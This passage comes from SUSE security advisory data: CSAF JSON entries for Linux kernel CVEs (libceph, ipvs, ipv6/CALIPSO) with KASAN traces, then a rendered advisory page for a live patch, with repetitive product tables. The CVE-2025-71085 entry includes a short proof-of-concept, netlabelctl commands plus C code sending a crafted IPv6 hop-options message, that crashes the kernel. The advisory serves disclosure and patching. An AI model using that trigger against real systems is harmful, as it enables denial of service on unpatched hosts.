"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1048-1
Vulnerability from csaf_suse - Published: 2026-03-26 04:34 - Updated: 2026-03-26 04:34Summary
Security update for the Linux Kernel (Live Patch 31 for SUSE Linux Enterprise 15 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 31 for SUSE Linux Enterprise 15 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.124 fixes various security issues
The following security issues were fixed:
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1047,SUSE-2026-1048,SUSE-2026-1050,SUSE-2026-1054,SUSE-2026-1055,SUSE-SLE-Module-Live-Patching-15-SP4-2026-1047,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1050
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
